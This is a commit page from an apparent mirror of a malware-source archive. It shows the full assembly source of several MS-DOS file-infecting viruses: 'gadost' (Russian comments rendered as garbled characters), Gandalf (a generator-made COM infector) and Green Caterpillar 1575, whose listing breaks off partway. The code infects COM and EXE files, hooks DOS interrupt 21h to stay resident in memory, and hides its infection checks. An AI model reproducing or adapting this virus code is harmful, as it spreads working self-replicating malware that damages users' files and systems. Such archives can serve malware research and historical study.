daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 07:49:24 +00:00
Code Issues Projects Releases Wiki Activity

re-organize

Browse Source 
push
This commit is contained in:
vxunderground
2022-08-21 04:07:57 -05:00
parent 74dbd37f30
commit 4b9382ddbc
1392 changed files with 607600 additions and 607600 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/G-Index/Virus.MSDOS.Unknown.GrimReaper_v4_4.asm
+1288
View File
File diff suppressed because it is too large Load Diff
MSDOS/G-Index/Virus.MSDOS.Unknown.gadost.asm
+228
View File
@@ -0,0 +1,228 @@
;
; ¥ª®¬¥­¤ã¥âáï ®âª®¬¯¨«¨à®¢ âì, § ¯ãáâ¨âì ¨ ⮫쪮 ¯®â®¬ à áᬠâਢ âì
; source code. (‚ᥠࠢ­® ‚ ¬ ¢ ­¥¬ à §¡¨à âìáï ¯à¨¤¥âáï :-)).
;
; Œ¨«¥­ìª ï (¬ «¥­ìª ï) £ ¤®áâì, ¬¥à§®áâì, ¤àï­ì, ᪮⨭ ...
;
; ‚ ®¡é¥¬, ¢¨àãá, ª®â®àë© § à ¦ ¥â ¢á直¥ â ¬ ä ©«ë ¯à¨ ¯®¯ë⪥ ¨å
; § ¯ãáâ¨âì - ¯®ª  á ä ¬¨«¨¥© .COM, ¦¨¢¥â £¤¥-â® ­  ç¥à¤ ª¥ ¯®¤ ¢¥ªâ®à®¬
; 21-£® ¨­â¥àà ¯â , ­¥ áªà뢠¥â ᢮¥ ⥫® ¦¨à­®¥ ¢ ãâ¥á å, § à ¦¥­­ë¥
; ä ©«ë ®¯®§­ ¥â ¯® èãਪ¥­ã (â ª®© ⨯  §¢¥§¤®çª¨, ¨á¯®«ì§ã¥âáï ã
; ¢®áâ®ç­ëå ­ à®¤®¢ ¤«ï ®âᥪ ­¨ï £®«®¢ë ¨ ¥é¥ ª®¥-祣® ã ¡«¨¦­¥£®
; ᢮¥£®), à á¯®«®¦¥­­®¬ã ¢ 4-®¬ ¡ ©â¥ ®â ­ ç « ,   ᢮¥ ­ «¨ç¨¥ ¢
; ¯ ¬ï⨠¯à®¢¥àï¥â â ª: ª« ¤¥â ¢ AX á«®¢® BABA (¢ á¬ëá«¥, ­¥ â ª®¥
; á«®¢®,   word 0BABAh), ¢ë¯®«­ï¥â 21-¥ ¨­â¥à࠯⮢ ­¨¥ ¨ ᬮâà¨â,
; ¦¥« îâ «¨ íâã ¡ ¡ã 0FACCh. …᫨ ¦¥« îâ, â® á â çª®© ¢á¥ ¯®­ïâ­®.
;
; Copyright (c) 1992, Gogi&Givi International
;
.model tiny
.code
org 0100h
VirPar equ (endvir-StartVirus)/16+2 ; ‘ª®ª  ã ¢¨àãá  ¯ à £à ä®¢
VirLen equ (endvir-StartVirus) ;  §¬¥àë ¡îáâ  ¢¨àãá  ¢
; âà¥ã£®«ì­ëå ª¨«®¬¥âà å
gadost:
db 'è' ; …â® ª®¤ CALL
dw StartVirus-$-2 ; € ¥â® ᬥ饭¨¥ ­  StartVirus
db 15,09h ; ˜ãਪ¥­ ¨ ®áâ â®ª ®â mov ah,
int 21h ; € íâ® ¢á¥ ­®à¬ «ì­ë©
ret ; ª®¤ ¦¥àâ¢ë
GoodMessage db '’®¢ à¨é ‹®§¨­áª¨©! ”€Š ž!',13,10,'$'
;  ª®áâ­ë© ¬¥áá ¤¦ ¤«ï ¤ï¤¨
; ‹®§¨­áª®£®
StartVirus:
pop si ; â® ç⮡ë 㧭 âì, ªã¤  ­ á
call EntryPoint ; § ­¥á«®
EntryPoint:
pop si ; ‚믨孥¬  ¤à¥á ­ ç «  § à §ë
push ds ; ‘®åà ­¨¬ ¯ àã-âனªã ॣ¨áâ஢...
push es
push si
mov ax,cs ; ‚®ááâ ­®¢¨¬ ᯥàâë¥ ¡ ©âë
mov es,ax ; ¨§ § ¤­¨æë ä ©« 
mov ds,ax
mov di,0100h
add si,RobbedBytes-EntryPoint
mov cx,4
cld ; â® ¢®ááâ ­®¢«¥­¨¥
rep movsb
pop si
mov ax,0BABAh ; ஢¥à¨¬, å®âïâ «¨ ¡ ¡ã -
int 21h ; ¢ á¬ëá«¥, ¥áâì «¨ ¬ë
cmp ax,0FACCh ; ¢ ¯ ¬ïâ¨
jne NeedsBaba ; ‚¨¤ âì, å®âïâ ¥¥, த¨¬ãî!
jmp FucksNow ; …¥ 㦥 ®¡à ¡ â뢠îâ
NeedsBaba:
pop es
push es
mov ax,es ; Žâà뢠¥¬ ᥡ¥ á¥­â PSP
dec ax
mov es,ax ; ‘⮫쪮 ¢ ­ è¥© ¯ ª®áâ¨
mov ax,es:[3] ; ¯ à £à ä®¢
sub ax,virpar
mov es:[3],ax
mov bx,es:[1] ; «îá ®¤­  PSP
add bx,ax ; ‚ᥠᢠ«¨¢ ¥¬ ¢ ªãçã
mov es,bx
push ds ; ã, íâ® ¯®­ïâ­®
xor ax,ax
mov ds,ax
mov ax,ds:[21h*4] ; ‡ å¢ â뢠¥¬ áâ àë©
mov cs:[si+Off21-EntryPoint],ax ; ¢¥ªâ®à int 21h
mov ax,ds:[21h*4+2] ; ‚ á¬ëá«¥, ®­ ­¥ áâ àë©,
mov cs:[si+Seg21-EntryPoint],ax ; ®­ ¤ ¦¥ «ãçè¥ ­®¢®£®
pop ds
xor di,di ; ‡ á®¢ë¢ ¥¬ ¢ ­ ç «®
push si ; ­¨ç¥©­®£® ᥣ¬¥­â 
sub si,EntryPoint-StartVirus ; £¤¥-â® ­  § ¤¢®àª å
mov cx,VirLen ; ¯ ¬ï⨠­ è¥ £­ãá­®¥
rep movsb ; ⥫®
pop si
push ds ; ˆ áâ ¢¨¬ ­  㪠§ ­­®¥
xor ax,ax ; £­ãá­®¥ ⥫® ¢¥ªâ®à
mov ds,ax ; ¯à¥à뢠­¨ï 21h
mov word ptr ds:[21h*4],Int21Server-StartVirus
mov ds:[21h*4+2],es
pop ds
FucksNow:
pop es ; â® ¢ á«ãç ¥, ¥á«¨
pop ds ; ¯à¥¤«®¦¥­­®© ¦¥­é¨­®©
mov si,0100h ; (¢¨àãᮬ) 㦥 ®¡« ¤ îâ
push si
xor ax,ax ; ‚ᥠ¢®ááâ ­ ¢«¨¢ ¥¬ ª
xor bx,bx ; ï¤à¥­¥ ”¥­¥ - ¨ ¤®¬®©,
xor di,di ; ª ¬ ¬¥
ret
Int21Server:
pushf ; â® ­®¢ë© ®¡à ¡®â稪
push ax ; 21-£® ¨­â 
push bx
push ds
cmp ax,0BABAh ; ’ãâ ¬ë ãáâ ­®¢¨¬ ॠªæ¨î
jne NotTest ; ­  ¯à¥¤«®¦¥­¨¥ ¦¥­é¨­ë
pop ds ; (¨«¨ í४æ¨î)
pop bx
pop ax
popf
mov ax,0FACCh ; â® ­®à¬ «ì­ ï í४æ¨ï
iret ; (â® ¥áâì ॠªæ¨ï)
NotTest:
push cx ; ’ãâ ¬ë ª« áá­® ¨§¢à â¨¬áï,
mov cx,ax ; ç⮡ë ᤥ« âì ¢¨¤, çâ®
xchg cl,ch ; ­ ¬ ᮢᥬ ­¥ ­ã¦­®
xor cl,4Bh ; ®¡à ¡ â뢠âì äã­ªæ¨î EXEC
pop cx ; (—⮡ ‹®§¨­áª¨© £®«®¢ã «®¬ «
jz Exec ; ¨ ç⮡ ã ­¥£® ®çª¨ § ¯®â¥«¨)
jmp NotExec
Exec:
mov bx,dx ; ®ª« ¤¥¬ ᬥ饭¨¥ ¨¬¥­¨
; § ¯ã᪠¥¬®£® ä ©«  ¢ BX
SearchZero:
cmp byte ptr ds:[bx],0 ; ஢¥à¨¬ ­  §¥àã
je ZeroFound ; €å, ª®­¥æ ¨¬¥­¨!
inc bx
jmp SearchZero
ZeroFound:
sub bx,11 ; —㤥᭮!
push es ; ஢¥à¨¬, ¢¤à㣠ª ª®©-
mov ax,cs ; ­¨¡ã¤ì ¯á¨å ¦¥« ¥â
mov es,ax ; § à §¨âì COMMAND.COM
mov cx,11
mov di,offset CommandName-StartVirus
Compare:
mov al,ds:[bx] ; â® ¢á¥ á«®¦­ ï ¨ ­ã¤­ ï
cmp al,es:[di] ; ¯à®æ¥¤ãà  ¯à®¢¥àª¨...
jne NotCommand
inc bx
inc di
dec cx ; ‚ᥠ¯à®¢¥à塞, ¯à®¢¥à塞...
cmp cx,0
jne Compare
pop es
jmp Quit21Server ; —â® ¦ ï - ¤¥¡¨« COMMAND.COM
; § à ¦ âì?!
NotCommand:
pop es ; ’ ¬ ¬ë á®å࠭﫨 祣®©-â 
push ax
push bx ; ‘®åà ­¨¬ ¢á¥, çâ® ¯«®å®
push cx ; «¥¦¨â, çâ®¡ë ­¥ ¯à®¯ «®
push dx
mov ax,3D02h ; Žâªã¯®à¨¢ ¥¬ ª«¨¥­â  (ä ©«)
int 21h
jc EndExec ; 뢠îâ ¨ £­ãâë¥ ¯à®¡ª¨
mov bx,ax ; ®ª« ¤¥¬ ¯à®¡ªã ®â ä ©«  ¢ BX
mov cx,4 ; •®â¥«®áì ¡ë áç¨â âì 4 ¡ ©â 
mov ax,cs
mov ds,ax
mov ah,3Fh ; ‚ ¬¥áâ®, £¤¥ «¥¦ «¨
mov dx,offset RobbedBytes-StartVirus
int 21h ; ᯥàâë¥ ¡ ©âë
jc EndExec
cmp word ptr cs:[RobbedBytes-StartVirus],'ZM'
je CloseFile ;   䨣  EXE § à ¦ âì???
xor cx,cx
xor dx,dx
mov ax,4202h
int 21h ; ‹¥§¥¬ ¢ § ¤­¨æã ä ©« 
cmp ax,1000 ;   䨣  ­ ¬ ä ©«ë ¬¥­ìè¥
jl CloseFile ; 1 ª¨«®?
cmp ax,64000 ; € ⥬ ¡®«¥¥ ¡®«ìè¥ 64
ja CloseFile
sub ax,3
mov cs:[FileSize-StartVirus],ax ; ˜ãਪ¥­  ?
cmp byte ptr cs:[RobbedBytes-StartVirus+3],15
je CloseFile ; ˆª¥¡ ­ !
mov ax,cs
mov ds,ax
mov ah,40h ; ƒ«ã¯ë© ¢¨àãá ஡ª® ¯àïç¥â
xor dx,dx ; ⥫® ¦¨à­®¥ ¢ § ¤­¨æ¥ ä ©« 
mov cx,VirLen
int 21h
xor cx,cx ; ˆ ¢ ­ ç «® ã¡¥£ ¥â, ç⮡ë
xor dx,dx ; JUMP â㤠 ¯®áâ ¢¨âì
mov ax,4200h
int 21h
mov ah,40h
mov dx,offset SuperByte-StartVirus ; ” ©« ­  â® ¨ ä ©«, ç⮡ë
mov cx,4 ; ¢ë§ë¢ âì ¯®¤ª«¥¥­­ë©
int 21h ; ᧠¤¨ ¢¨àãá
CloseFile:
mov ah,3Eh ; ‘¨¥ § ªàë⨥ ä ©«  - ­ ¬
int 21h ; ®­ ¡®«ìè¥ ¢  é¥ ­¥ ­ã¦¥­
EndExec:
pop dx ; Œë â ¬, ª ¦¨áì, á®å࠭﫨
pop cx ; ®¯ïâì 祣®©-â ?
pop bx
pop ax
jmp Quit21Server ; ˆ ¯® ¡ ¡ ¬!
NotExec:
;   á«ãç © á«¥¤ãîé¨å 堬᪨å ࠧࠡ®â®ª
Quit21Server:
pop ds ; —¥¬ ¦¥ ¬ë ⮫쪮
pop bx ; STACK' ­ ­¥ ­ ¯®«­ï«¨?!
pop ax
popf ; …é¥ ¨ ä« £ ¬¨?!!!
db 0EAh
Off21 dw 0000h ; ’ ª ¡ã¤¥â á ª ¦¤ë¬, ªâ®...
Seg21 dw 0000h
RobbedBytes:
mov dx,offset GoodMessage ; â® ¢à®¤¥ ª ª ᯥàâë¥ ¡ ©âë
db 0B4h
SuperByte db 'è' ; € íâ® ­¥ ᯥàâë¥, ­®
FileSize dw 0000h ; ⮦¥ å®à®è¨¥
db 15 ; ˜ãਪ¥­ 
db '=>' ; â® ¤«ï ªà á®âë
CommandName db 'COMMAND.COM<=' ; € íâ® ®â COMMAND.COM
endvir:
end gadost ; ˆ ¢á¥!
MSDOS/G-Index/Virus.MSDOS.Unknown.gandalf.asm
+202
View File
@@ -0,0 +1,202 @@
; Virus generated by Gý 0.70á
; Gý written by Dark Angel of Phalcon/Skism
; File: GANDALF.ASM
; Gandalf by Ender
.model tiny
.code
; Assemble with:
; TASM /m3 filename.ASM
; TLINK /t filename.OBJ
org 0100h
carrier:
db 0E9h,0,0 ; jmp start
start:
call next
next:
pop bp
sub bp, offset next
mov ah, 0047h ; Get directory
lea si, [bp+offset origdir+1]
cwd ; Default drive
int 0021h
lea dx, [bp+offset newDTA]
mov ah, 001Ah ; Set DTA
int 0021h
mov ax, 3524h
int 0021h
push es
push bx
lea dx, [bp+INT24] ; ASSumes ds=cs
mov ax, 2524h
int 0021h
push cs
pop es
restore_COM:
mov di, 0100h
push di
lea si, [bp+offset old3]
movsb
movsw
mov byte ptr [bp+numinfect], 0000h
traverse_loop:
lea dx, [bp+offset COMmask]
call infect
cmp [bp+numinfect], 0007h
jae exit_traverse ; exit if enough infected
mov ah, 003Bh ; CHDIR
lea dx, [bp+offset dot_dot] ; go to previous dir
int 0021h
jnc traverse_loop ; loop if no error
exit_traverse:
lea si, [bp+offset origdir]
mov byte ptr [si], '\'
mov ah, 003Bh ; restore directory
xchg dx, si
int 0021h
pop dx
pop ds
mov ax, 2524h
int 0021h
mov dx, 0080h ; in the PSP
mov ah, 001Ah ; restore DTA to default
int 0021h
return:
ret
old3 db 0cdh,20h,0
INT24:
mov al, 0003h
iret
infect:
mov cx, 0007h ; all files
mov ah, 004Eh ; find first
findfirstnext:
int 0021h
jc return
mov ax, 4300h
lea dx, [bp+newDTA+30]
int 0021h
jc return
push cx
push dx
mov ax, 4301h ; clear file attributes
push ax ; save for later use
xor cx, cx
int 0021h
mov ax, 3D02h
lea dx, [bp+newDTA+30]
int 0021h
mov bx, ax ; xchg ax,bx is more efficient
mov ax, 5700h ; get file time/date
int 0021h
push cx
push dx
mov ah, 003Fh
mov cx, 001Ah
lea dx, [bp+offset readbuffer]
int 0021h
mov ax, 4202h
xor cx, cx
cwd
int 0021h
cmp word ptr [bp+offset readbuffer], 'ZM'
jz jmp_close
mov cx, word ptr [bp+offset readbuffer+1] ; jmp location
add cx, heap-start+3 ; convert to filesize
cmp ax, cx ; equal if already infected
jl skipp
jmp_close:
jmp close
skipp:
cmp ax, 65535-(endheap-start) ; check if too large
ja jmp_close ; Exit if so
cmp ax, (heap-start) ; check if too small
jb jmp_close ; Exit if so
lea si, [bp+offset readbuffer]
lea di, [bp+offset old3]
movsb
movsw
sub ax, 0003h
mov word ptr [bp+offset readbuffer+1], ax
mov dl, 00E9h
mov byte ptr [bp+offset readbuffer], dl
lea dx, [bp+offset start]
mov ah, 0040h ; concatenate virus
mov cx, heap-start
int 0021h
xor cx, cx
mov ax, 4200h
xor dx, dx
int 0021h
mov cx, 0003h
lea dx, [bp+offset readbuffer]
mov ah, 0040h
int 0021h
inc [bp+numinfect]
close:
mov ax, 5701h ; restore file time/date
pop dx
pop cx
int 0021h
mov ah, 003Eh
int 0021h
pop ax ; restore file attributes
pop dx ; get filename and
pop cx ; attributes from stack
int 0021h
mov ah, 004Fh ; find next
jmp findfirstnext
signature db '[PS/Gý]',0 ; Phalcon/Skism Gý
creator db 'Ender',0
virusname db 'Gandalf',0
COMmask db '*.COM',0
dot_dot db '..',0
heap:
newDTA db 43 dup (?)
origdir db 65 dup (?)
numinfect db ?
readbuffer db 1ah dup (?)
endheap:
end carrier
MSDOS/G-Index/Virus.MSDOS.Unknown.gc1575a.asm
+929
View File
@@ -0,0 +1,929 @@
; Green_Caterpillar.1575.A
; TASM /M
seg000 segment byte public 'CODE'
assume cs:seg000
org 100h
assume es:nothing, ss:nothing, ds:seg000
start proc near
jmp short RealStart
db 90h
Int21Ofs dw 0
Int21Seg dw 0
Int1COfs dw 0
Int1CSeg dw 0
exeHeader dw 20CDh
exeMOD dw 9090h
exeDIV dw 0
exeNumSeg dw 0
exeHeadSize dw 0
exeMinPara dw 0
exeMaxPara dw 0
exeSS dw 0
exeSP dw 0
exeCheckSum dw 0
exeIP dw 0
exeCS dw 0
StartCS dw 0
StartIP dw 0
FileSizeHW dw 0
FileSizeLW dw 0
StoreSS dw 0
DTAOffset dw 0
DTASegment dw 0
StartSS dw 0
StoreBP dw 0
StoreES dw 0
Int24Seg dw 0
Int24Ofs dw 0
GenCounter db 16
byte_0_13C db 7, 57h, 75h, 2, 5Ch, 7, 70h, 0, 16h, 0, 0BFh, 0Bh, 5Ch, 7, 70h, 0
RealStart:
push es
push ds
mov ax, es
push cs
pop ds ; DS = CS
push cs
pop es ; ES = CS
assume es:seg000
mov StoreES, ax
mov ax, ss
mov StoreSS, ax
mov al, 2
out 20h, al ; Interrupt controller, 8259A.
cld
xor ax, ax
mov ds, ax ; DS points to IVT
assume ds:nothing
xor si, si
mov di, 13Ch
mov cx, 16
repne movsb
push ds
pop ss ; SS = DS
assume ss:nothing
mov bp, 8
xchg bp, sp
call near ptr sub_0_1C5
jmp StoreFilename
start endp
FixupInts:
call GetInt24Vecs
call CheckInfection
jz AlreadyInf ; Infected Already? Then JMP.
mov al, ds:FileType
push ax
call InfectCOM
pop ax
mov ds:FileType, al
jmp short RestoreFile
nop
AlreadyInf:
call GetIntVectors
call CheckForInstall
cmp ds:FileType, 0 ; No File Type?
jnz RestoreFile ; No? Then JMP.
mov ax, 4C00h
int 21h ; Exit To DOS
RestoreFile: ; COM File?
cmp ds:FileType, 'C'
jnz RestoreEXE ; No? Then JMP.
RestoreCOM:
pop ds
assume ds:seg000
pop es
assume es:nothing
push cs
pop ds ; DS = CS
pop es
push es
mov di, offset start
mov si, offset exeHeader
mov cx, 12
repne movsb ; Restore Original 12 Bytes
push es
pop ds ; DS = ES
mov ax, offset start
push ax
xor ax, ax
retf ; Return to Original COM Program
sub_0_1C5 proc far
mov si, 6
lodsw
cmp ax, 192h
jz RestoreCOM
cmp ax, 179h
jnz loc_0_1D6
jmp loc_0_27F
loc_0_1D6:
cmp ax, 1DCh
jz RestoreEXE
retn
RestoreEXE:
pop ds
pop es
mov bx, cs:exeSS
sub bx, cs:StartSS
mov ax, cs
sub ax, bx
mov ss, ax
assume ss:nothing
mov bp, cs:StoreBP
xchg bp, sp
mov bx, cs:exeCS
sub bx, cs:StartCS
mov ax, cs
sub ax, bx
push ax
mov ax, cs:StartIP
push ax
retf
sub_0_1C5 endp
Caterpillar db '#'
db 1Ah
db '<'
db '#'
db '/'
db '-'
db '-'
db '!'
db '.'
db '$'
db 0Eh
db '#'
db '/'
db '-'
db 'à'
FileName db 'A:10KBYTE.EXE',0
db 0 ;
db 24h ; $
db 24h ; $
db 24h ; $
db 24h ; $
db 24h ; $
CheckInfection proc near
mov ax, 3D02h
mov dx, offset FileName
int 21h ; Open File
jnb CheckOpened ; No problems? Then JMP.
clc
retn
CheckOpened:
mov StoreSS, ax
mov dx, offset NewInt24
mov ax, 2524h
int 21h ; Set New Int 24h Vectors
mov ax, 4202h
mov bx, StoreSS
mov cx, 0FFFFh
mov dx, 0FFFEh
int 21h ; Move Pointer to End of File - 1
mov dx, offset CheckBytes
mov ah, 3Fh
mov bx, StoreSS
mov cx, 2
int 21h ; Read In 2 Bytes
mov ah, 3Eh
int 21h ; Close File
push ds
mov dx, Int24Ofs
mov ax, Int24Seg
mov ds, ax
mov ax, 2524h
int 21h ; Restore Int 24h Vectors
pop ds
cmp CheckBytes, 0A0Ch ; Infected Already?
clc
retn
CheckInfection endp
CheckBytes dw 0
loc_0_27F:
cmp ax, 22Dh
jz InfectCOM
push ds
pop es ; ES = DS
assume es:seg000
push cs
pop ds ; DS = CS
mov ax, StoreSS
mov ss, ax ; SS = SS
assume ss:nothing
xchg bp, sp
mov si, offset byte_0_13C
mov di, 0
mov cx, 16
cld
repne movsb
jmp FixupInts
InfectCOM proc near
mov al, 'C'
mov FileType, al
mov al, 8
out 70h, al ; CMOS Memory:
; used by real-time clock
in al, 71h ; CMOS Memory
mov GenCounter, al
mov dx, offset FileName
mov ax, 3D02h
int 21h ; Open File
jnb COMOpened ; No problems? Then JMP.
retn
COMOpened: ; Store Handle
mov StoreSS, ax
mov dx, offset exeHeader
mov bx, StoreSS
mov cx, 12
mov ah, 3Fh
int 21h ; Read In 12 Bytes From File
mov ax, 4202h
xor cx, cx
xor dx, dx
int 21h ; Move Pointer to End of File
push ax
add ax, 10h
and ax, 0FFF0h
push ax
shr ax, 1
shr ax, 1
shr ax, 1
shr ax, 1 ; Fix For Segment Size
mov di, offset VirusFixedSeg
stosw ; Store Segment Value
pop ax
pop bx
sub ax, bx
mov cx, 1575
add cx, ax
mov dx, offset start
sub dx, ax
mov bx, StoreSS
mov ah, 40h
int 21h ; Write Virus to File
mov ax, 4200h
xor cx, cx
xor dx, dx
int 21h ; Move Pointer to Beginning of File
mov ah, 40h
mov bx, StoreSS
mov cx, 12
mov dx, offset COMHeader
int 21h ; Write COM Header to File
mov ah, 3Eh
mov bx, StoreSS
int 21h ; Close File
retn
InfectCOM endp
COMHeader:
push cs
mov ax, cs
PUSHOffset db 5
VirusFixedSeg dw 0 ; PUSH Fixed Segment
push ax
mov ax, offset start
push ax
retf
InfectEXE proc near
mov al, 'E'
mov FileType, al
mov al, 8
out 70h, al ; CMOS Memory:
; used by real-time clock
in al, 71h ; CMOS Memory
mov GenCounter, al
mov dx, offset FileName
mov ax, 3D02h
int 21h ; Open EXE File
jnb EXEOpened ; No problems? Then JMP.
retn
EXEOpened:
mov StoreSS, ax
mov dx, offset exeHeader
mov bx, StoreSS
mov cx, 24
mov ah, 3Fh
int 21h ; Read In 24 Bytes
mov ax, 4202h
mov cx, 0
mov dx, 0
int 21h ; Move pointer to End of File
push ax
add ax, 10h
adc dx, 0
and ax, 0FFF0h
mov FileSizeHW, dx
mov FileSizeLW, ax
mov cx, 1831
sub cx, 100h
add ax, cx
adc dx, 0
mov cx, 512
div cx
inc ax
mov exeDIV, ax
mov exeMOD, dx
mov ax, exeCS
mov StartCS, ax
mov ax, exeIP
mov StartIP, ax
mov ax, exeSS
mov StartSS, ax
mov ax, exeSP
mov StoreBP, ax
mov dx, FileSizeHW
mov ax, FileSizeLW
mov cx, 10h
div cx
sub ax, 10h
sub ax, exeHeadSize
mov exeCS, ax
mov exeSS, ax
mov exeIP, 100h
mov exeSP, 100h
mov ax, 4200h
xor cx, cx
mov dx, 2
int 21h ; Move Pointer to Beginning + 2
mov dx, offset exeMOD
mov bx, StoreSS
mov cx, 22
mov ah, 40h
int 21h ; Write New EXE Header
mov ax, 4202h
xor cx, cx
xor dx, dx
int 21h ; Move Pointer to End Of File
mov dx, 100h
mov ax, FileSizeLW
pop cx
sub ax, cx
sub dx, ax
mov cx, 1831
add cx, ax
sub cx, 100h
mov ah, 40h
int 21h ; Write Virus To File
mov ah, 3Eh
int 21h ; Close File
retn
InfectEXE endp
FindFirstFile:
push cx
mov cx, 0
mov ah, 4Eh
int 21h ; Find First File
pop cx
retn
GetIntVectors proc near
push es
mov ax, 351Ch
int 21h ; Get Int 1Ch Vectors
mov cs:Int1COfs, bx
mov cs:Int1CSeg, es
mov ax, 3521h
int 21h ; Get Int 21h Vectors
push es
pop ax
mov cs:Int21Seg, ax
mov cs:Int21Ofs, bx
pop es
assume es:nothing
retn
GetIntVectors endp
CheckForInstall proc near
push ax
push es
push ds
xor ax, ax
mov es, ax ; ES points to IVT
assume es:nothing
mov si, 86h
mov ax, es:[si] ; Get Int 21h Segment
mov ds, ax
mov si, offset InfMarker
cmp word ptr [si], 0A0Ch ; In Memory Already?
jnz InstallVirus ; No? Then JMP.
push ds
pop ax
call sub_0_601
pop ds
pop es
assume es:nothing
pop ax
retn
InstallVirus:
push cs
pop ds
mov ax, StoreES
dec ax
mov es, ax ; ES points to MCB
cmp byte ptr es:0, 'Z' ; Last MCB?
jz GotLastMCB ; Yes? Then JMP.
jmp short NotLastMCB
nop
GotLastMCB: ; Get Amount of Memory in MCB
mov ax, es:3
CheckForInstall endp
mov cx, 1847
shr cx, 1
shr cx, 1
shr cx, 1
shr cx, 1 ; Calculate Paragraphs
sub ax, cx ; Subtract 1847 Bytes
jb NotLastMCB ; Enough Memory? No? Then JMP.
mov es:3, ax ; Set New Amount of Memory in MCB
sub es:12h, cx ; Set Next Segment Value
push cs
pop ds ; DS = CS
mov ax, es:12h
push ax
pop es ; ES points to Virus Segment
mov si, offset start
push si
pop di
mov cx, 1575
cld
repne movsb ; Copy Virus Into Memory
push es
sub ax, ax
mov es, ax ; ES points to IVT
assume es:nothing
mov si, 84h
mov dx, offset NewInt21
mov es:[si], dx ; Set New Int 21h Offset
inc si
inc si
pop ax
mov es:[si], ax ; Set New Int 21h Segment
NotLastMCB:
pop ds
pop es
assume es:nothing
pop ax
retn
NewInt21: ; Virus Calling?
cmp al, 57h
jnz CheckForDTACall ; No? Then JMP.
jmp short JMPInt21
nop
CheckForDTACall: ; Set New DTA Segment/Offset
cmp ah, 1Ah
jnz CheckFindFCB ; No? Then JMP.
call StoreDTAVecs
jmp short JMPInt21
nop
CheckFindFCB: ; Find First File (FCB)?
cmp ah, 11h
jnz CheckFindNextMC ; No? Then JMP.
call FindFirstFCB
iret
CheckFindNextMC: ; Find Next File (FCB)?
cmp ah, 12h
jnz JMPInt21 ; No? Then JMP.
call FindNextFCB
iret
JMPInt21:
jmp dword ptr cs:Int21Ofs
FindFirstFCB proc near
mov al, 57h ; Virus Calling
int 21h ; Find First File (FCB)
push ax
push cx
push dx
push bx
push bp
push si
push di
push ds
push es
push cs
pop ds ; DS = CS
push cs
pop es ; ES = CS
assume es:seg000
mov cs:InfectCount, 0
nop
call GetFilename
jnz GotBadFile
call CheckInfection
jz GotBadFile
call DoInfection
dec InfectCount
GotBadFile:
pop es
assume es:nothing
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
retn
FindFirstFCB endp
GetFilename proc near
push cs
pop es ; ES = CS
assume es:seg000
push cs
pop es ; ES = CS
cld
call StoreFilename
jnb CheckExt ; No problems? Then JMP.
cmp di, 0
retn
CheckExt:
mov di, offset FileName
mov al, '.'
mov cx, 11
repne scasb ; Scan for File Extension
cmp word ptr [di], 'OC' ; COM File?
jnz CheckForEXE ; No? Then JMP.
cmp byte ptr [di+2], 'M' ; COM File?
jnz CheckForEXE ; No? Then JMP.
mov FileType, 'C'
nop
retn
CheckForEXE: ; EXE File?
cmp word ptr [di], 'XE'
jnz BadFileType ; No? Then JMP.
cmp byte ptr [di+2], 'E' ; EXE File?
jnz BadFileType ; NO? Then JMP.
mov FileType, 'E'
nop
BadFileType:
retn
GetFilename endp
StoreFilename proc near
push ds
mov si, cs:DTAOffset
mov ax, cs:DTASegment
mov ds, ax
mov di, offset FileName
lodsb
cmp al, 0FFh ; Extended FCB?
jnz RegularFCB ; No? Then JMP.
add si, 6 ; Add For Extended FCB
lodsb ; Get First Character
jmp short FileOnDrive
nop
RegularFCB: ; Is this a file on a drive?
cmp al, 5
jb FileOnDrive ; Yes? Then JMP.
pop ds
stc
retn
FileOnDrive:
mov cx, 11
cmp al, 0 ; End of Filename?
jz EndOfName ; Yes? Then JMP.
add al, 40h ; Capitalize Drive Letter
stosb ; Store Drive Letter
mov al, ':'
stosb
EndOfName:
lodsb
cmp al, 20h ; End of Filename?
jz EndOFFilename ; Yes? Then JMP.
stosb ; Store Character
jmp short GetNextChar
nop
EndOFFilename:
cmp byte ptr es:[di-1], '.'
jz GetNextChar
mov al, '.'
stosb ; Store EXTENSION Marker
GetNextChar:
loop EndOfName
mov al, 0
stosb ; Store End of Filename
pop ds
clc
retn
StoreFilename endp
FindNextFCB proc near
mov al, 57h ; Virus Call
int 21h ; Find Next File (FCB)
push ax
push cx
push dx
push bx
push bp
push si
push di
push ds
push es
push cs
pop ds ; DS = CS
push cs
pop es ; ES = CS
cmp cs:InfectCount, 0 ; Infected one yet?
jz CheckFile ; No? Then JMP.
jmp short BadFile
nop
CheckFile:
call GetFilename
jnz BadFile ; Bad? Then JMP.
call CheckInfection
jz BadFile ; Infected Already? Then JMP.
call DoInfection
dec InfectCount
pop es
assume es:nothing
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
retn
BadFile:
pop es
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
retn
FindNextFCB endp
InfectCount db 0
StoreDTAVecs proc near
push ax
push ds
pop ax
mov cs:DTASegment, ax
mov cs:DTAOffset, dx
pop ax
retn
StoreDTAVecs endp
GetInt24Vecs proc near
push cs
mov al, 0
out 20h, al ; Interrupt controller, 8259A.
mov ax, 3524h
int 21h ; Get Int 24h Vectors
mov Int24Ofs, bx
mov bx, es
mov Int24Seg, bx
pop es
mov si, offset Caterpillar
mov di, offset FileName
mov cx, 15
loc_0_5FA:
lodsb
add al, 20h
stosb
loop loc_0_5FA
retn
GetInt24Vecs endp
sub_0_601 proc near
push ax
push cs
pop ds ; DS = CS
push cs
pop es ; ES = CS
assume es:seg000
mov bl, GenCounter
cmp bl, 0Ch
ja loc_0_648
cmp bl, 0
jz loc_0_648
mov al, 8
out 70h, al ; CMOS Memory:
; used by real-time clock
in al, 71h ; CMOS Memory
cmp al, 0Ch
ja loc_0_648
cmp al, 0
jz loc_0_648
cmp al, bl
jz loc_0_648
inc bl
call CheckCounter
cmp al, bl
jz loc_0_648
inc bl
call CheckCounter
cmp al, bl
jz loc_0_648
pop ds
call FillWithSpace
push cs
pop ds ; DS = CS
retn
sub_0_601 endp
CheckCounter proc near
cmp bl, 12 ; Counter Below or Equal to 12?
jbe Below12 ; Yes? Then JMP.
sub bl, 12 ; Reset Counter
Below12:
retn
CheckCounter endp
loc_0_648:
pop ax
retn
DoInfection proc near
mov dx, offset NewInt24
mov ax, 2524h
int 21h ; Set New Int 24h Vectors
cmp FileType, 'C' ; COM File?
